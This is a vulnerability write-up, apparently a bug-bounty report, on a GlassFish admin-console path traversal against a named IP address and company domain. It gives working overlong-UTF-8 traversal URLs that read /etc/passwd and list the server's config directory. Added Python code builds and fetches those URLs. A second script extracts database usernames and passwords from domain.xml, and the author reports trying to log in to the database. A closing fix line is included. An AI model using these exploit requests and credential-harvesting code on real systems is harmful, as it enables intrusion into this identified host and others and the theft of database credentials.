GlassFish Arbitrary File Read Vulnerability in an Application Server of youfu
Arbitrary file read vulnerability in the GlassFish application server
IP: 211.151.62.149
Verify that the vulnerability exists. Each %c0%ae is an overlong two-byte UTF-8 encoding of '.', so a "%c0%ae%c0%ae/" segment becomes "../" once the server decodes it, after any literal ".." check has already passed:
http://211.151.62.149:4848/theme/META-INF/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd
Traverse into the GlassFish installation directory and list its configuration directory:
http://211.151.62.149:4848/theme/META-INF/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/home/glassfish/glassfish4/glassfish/domains/domain1/config/
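An added example, not part of the original report, that builds the traversal URL used above and shows why the overlong encoding slips past a literal ".." filter: the percent-decoded bytes contain no "..", a strict UTF-8 decoder rejects them outright, but a permissive decoder maps each %c0%ae back to '.'. The host, port and base path are taken from the report; the passwd sample, the helper names and the depth parameter are assumptions made for the example.

```python
import urllib.parse
import urllib.request

# Overlong two-byte UTF-8 encoding of '.' (0x2E). A strict decoder rejects it;
# a permissive one maps it back to '.', so "%c0%ae%c0%ae/" decodes to "../".
OVERLONG_DOT = "%c0%ae"

# Base URL from the report. The traversal depth only has to reach "/";
# extra "../" segments past the root are harmless.
BASE_URL = "http://211.151.62.149:4848/theme/META-INF/"

# Constructed sample of what a successful read of /etc/passwd looks like.
SAMPLE_PASSWD = (
    "root:x:0:0:root:/root:/bin/bash\n"
    "glassfish:x:1001:1001::/home/glassfish:/bin/bash\n"
)


def traversal_url(base: str, depth: int, target: str) -> str:
    """Return base + depth x '%c0%ae%c0%ae/' + target (leading '/' stripped)."""
    segment = OVERLONG_DOT * 2 + "/"
    return base.rstrip("/") + "/" + segment * depth + target.lstrip("/")


def percent_decode(path: str) -> bytes:
    """Percent-decode to raw bytes, as the server does before UTF-8 decoding."""
    return urllib.parse.unquote_to_bytes(path)


def strict_utf8_rejects(raw: bytes) -> bool:
    """True if a spec-compliant UTF-8 decoder (Python's) refuses the bytes."""
    try:
        raw.decode("utf-8")
    except UnicodeDecodeError:
        return True
    return False


def lenient_utf8_decode(raw: bytes) -> str:
    """Decode ASCII plus two-byte sequences without rejecting overlong forms.

    This models the permissive decoding that makes the bypass work: the raw
    bytes contain no literal '..', yet decoding yields '..'. Anything else is
    replaced with U+FFFD.
    """
    out, i = [], 0
    while i < len(raw):
        b = raw[i]
        if b < 0x80:
            out.append(chr(b))
            i += 1
        elif 0xC0 <= b <= 0xDF and i + 1 < len(raw) and 0x80 <= raw[i + 1] <= 0xBF:
            out.append(chr(((b & 0x1F) << 6) | (raw[i + 1] & 0x3F)))
            i += 2
        else:
            out.append("\ufffd")
            i += 1
    return "".join(out)


def looks_like_passwd(body: str) -> bool:
    """Heuristic: a line with 7 colon-separated fields, user 'root', uid 0."""
    for line in body.splitlines():
        fields = line.split(":")
        if len(fields) == 7 and fields[0] == "root" and fields[2] == "0":
            return True
    return False


def fetch(url: str, timeout: int = 10) -> str:
    """Issue the request (network; only used when run as a script)."""
    with urllib.request.urlopen(url, timeout=timeout) as resp:
        return resp.read().decode("utf-8", "replace")


if __name__ == "__main__":
    url = traversal_url(BASE_URL, 10, "/etc/passwd")
    raw = percent_decode(url.split("META-INF/", 1)[1])
    print("literal '..' present:", b".." in raw)
    print("strict decoder rejects:", strict_utf8_rejects(raw))
    print("lenient decode:", lenient_utf8_decode(raw))
    print("passwd leaked:", looks_like_passwd(fetch(url)))
```

The point of the two decoders is the check a reviewer should apply to any path filter: validation must run on the fully decoded, canonical path, and overlong sequences must be rejected rather than silently normalised.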
domain.xml is found in the config directory and read.
It reveals the server domain name and the database connection information.
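An added example, not part of the original report, that extracts the JDBC pool credentials from a domain.xml once it has been read. The jdbc-connection-pool, jdbc-resource and property elements follow GlassFish's domain.xml layout; the embedded XML is a constructed placeholder, not the target's file, and the helper names are assumptions.

```python
import xml.etree.ElementTree as ET

# Constructed sample in the shape of a GlassFish domain.xml. The pool name,
# credentials and JDBC URL are placeholders, not data from the target.
SAMPLE_DOMAIN_XML = """<?xml version="1.0" encoding="UTF-8"?>
<domain>
  <resources>
    <jdbc-connection-pool name="mysql_app_pool"
        datasource-classname="com.mysql.jdbc.jdbc2.optional.MysqlDataSource"
        res-type="javax.sql.DataSource">
      <property name="User" value="appuser"/>
      <property name="Password" value="CHANGEME"/>
      <property name="URL" value="jdbc:mysql://127.0.0.1:3306/appdb"/>
    </jdbc-connection-pool>
    <jdbc-connection-pool name="pg_pool"
        datasource-classname="org.postgresql.ds.PGSimpleDataSource"
        res-type="javax.sql.DataSource">
      <property name="user" value="pguser"/>
      <property name="password" value="CHANGEME2"/>
      <property name="serverName" value="db.internal"/>
      <property name="portNumber" value="5432"/>
      <property name="databaseName" value="billing"/>
    </jdbc-connection-pool>
    <jdbc-resource jndi-name="jdbc/app" pool-name="mysql_app_pool"/>
    <jdbc-resource jndi-name="jdbc/billing" pool-name="pg_pool"/>
  </resources>
</domain>
"""


def jdbc_pools(xml_text: str) -> dict:
    """Map pool name -> lower-cased property dict for every jdbc-connection-pool."""
    root = ET.fromstring(xml_text)
    pools = {}
    for pool in root.iter("jdbc-connection-pool"):
        props = {p.get("name", "").lower(): p.get("value", "")
                 for p in pool.findall("property")}
        props["datasource-classname"] = pool.get("datasource-classname", "")
        pools[pool.get("name")] = props
    return pools


def jdbc_resources(xml_text: str) -> dict:
    """Map JNDI name -> pool name for every jdbc-resource."""
    root = ET.fromstring(xml_text)
    return {r.get("jndi-name"): r.get("pool-name") for r in root.iter("jdbc-resource")}


def _target(props: dict) -> str:
    """Prefer an explicit URL; otherwise assemble host:port/db from the parts."""
    if props.get("url"):
        return props["url"]
    host = props.get("servername", "")
    port = props.get("portnumber", "")
    db = props.get("databasename", "")
    return f"{host}:{port}/{db}"


def db_targets(xml_text: str) -> list:
    """Join resources to pools: [(jndi, target, user, password), ...]."""
    pools = jdbc_pools(xml_text)
    out = []
    for jndi, pool_name in jdbc_resources(xml_text).items():
        p = pools.get(pool_name, {})
        out.append((jndi, _target(p), p.get("user", ""), p.get("password", "")))
    return out


if __name__ == "__main__":
    for jndi, target, user, password in db_targets(SAMPLE_DOMAIN_XML):
        print(f"{jndi}: {user}:{password}@{target}")
```

The property names are matched case-insensitively because GlassFish pools use either the "User"/"Password"/"URL" form or the "user"/"password"/"serverName"/"portNumber"/"databaseName" form depending on the data source class.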
Attempted to connect to the database.
The database does not accept external connections, which is frustrating.
Server domain name discovered: https://yoopay.cn/
Proof of vulnerability: see the requests above.
Fix:
Upgrade GlassFish to a release that rejects overlong UTF-8 sequences in request paths, and do not expose the admin console port (4848) to the Internet.